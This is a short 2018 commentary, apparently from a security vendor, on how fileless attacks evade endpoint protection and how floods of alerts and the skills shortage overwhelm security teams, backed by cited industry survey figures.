April 2018
Cyber security is in the midst of a paradigm shift. Targeted attacks are outmaneuvering the prevention and detection mechanisms companies have in place. Endpoint protection solutions are incapable of detecting fileless attacks that are defined by behavior and the use of legitimate OS tools, rather than by a malicious program being installed on a machine. Detection technologies certainly detect suspicious events, but too often they fail to filter out noise from critical incidents, generating overwhelming numbers of alerts that have no hope of being processed.
According to a 2017 EMA study, 79% of security teams report being overwhelmed by high numbers of threat alerts. And it’s no wonder: for example, a study by Ovum found that 37% of banks receive more than 200,000 alerts per day, and 61% receive over 100,000. The Ponemon Institute reports that nearly half of all security alerts are false positives. Of the rest, a large share are inconsequential and easily remedied.
With the possibility to examine only a tiny fraction of alerts, overstretched security teams are forced to let the majority of alerts triggered on a daily basis go without attention. Teams are left frustrated. EMA found that 52% of operations personnel feel high levels of stress, with 21% of them stating that “not enough manpower” is a stress driver. The cyber security skills shortage itself is well-documented, with a 2017 ESG/ISSA finding the cyber security skills shortage worsening and impacting 70% of organizations.